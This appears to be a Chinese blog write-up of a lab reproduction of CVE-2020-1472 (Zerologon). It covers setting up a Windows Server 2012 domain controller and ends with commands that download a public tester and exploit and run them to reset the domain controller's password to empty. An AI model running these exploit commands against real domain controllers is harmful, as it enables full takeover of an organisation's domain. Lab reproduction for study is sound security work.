CVE-2020-1472复现打域控(包含Win Server 2012域环境搭建)

CVE-2020-1472复现打域控(包含Win Server 2012域环境搭建)

目的

Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空。

复现环境

DC:os:windows 2012 server ip:192.168.59.141
攻击机:os:kali ip:192.168.59.128

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) Windows Server, version 2004 (Server Core installation)

Win Server 2012域环境搭建

搭建windows server 2012域环境
安装虚拟机Windows server2012R2标准版

在这里插入图片描述

分配足够大的内存(至少8G)
在这里插入图片描述

等待安装成功
在这里插入图片描述

启动管理员账户Administrator,设置新的密码
在这里插入图片描述

注销当前账户,登录到Adminnistrator账户
在这里插入图片描述

设置静态IP地址192.168.92.145
在这里插入图片描述

添加DNS服务器
在这里插入图片描述

安装成功后进入DNS管理
在这里插入图片描述

创建一个正向解析记录
在这里插入图片描述

创建成功
在这里插入图片描述

添加角色或功能,添加AD域服务
在这里插入图片描述

安装成功将此服务器提升为域控制器
在这里插入图片描述

建立新林
在这里插入图片描述

设置密码
在这里插入图片描述

提供凭证,输入管理员账号密码
在这里插入图片描述

设置NETBIOS域名
在这里插入图片描述
下一步至先决条件检查,不意外的话点击安装并重启
在这里插入图片描述

重启之后添加角色或功能,安装IIS服务,
在这里插入图片描述
搭建完毕后,可以使用Netdom query fsmo命令查看域环境信息
在这里插入图片描述

nbtstat -n 获取当前机器的NetBIOS名称
在这里插入图片描述
查看域控主机ip地址
在这里插入图片描述至此域环境搭建完毕

CVE-2020-1472 复现

下载poc:https://github.com/SecuraBV/CVE-2020-1472
验证漏洞是否存在:

python3 /home/kali/Desktop/zerologon_tester.py  WIN-PEB4H6RPOC2  192.168.59.141 

如下图所示,漏洞存在
在这里插入图片描述

下载exp: git clone https://github.com/dirkjanm/CVE-2020-1472
置空DC的密码

python3 /home/kali/Desktop/cve-2020-1472-exploit.py WIN-PEB4H6RPOC2 192.168.59.141  

在这里插入图片描述

至此我们就成功地将域控中保存在AD中的管理员password设置为空,方便下一步的渗透。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值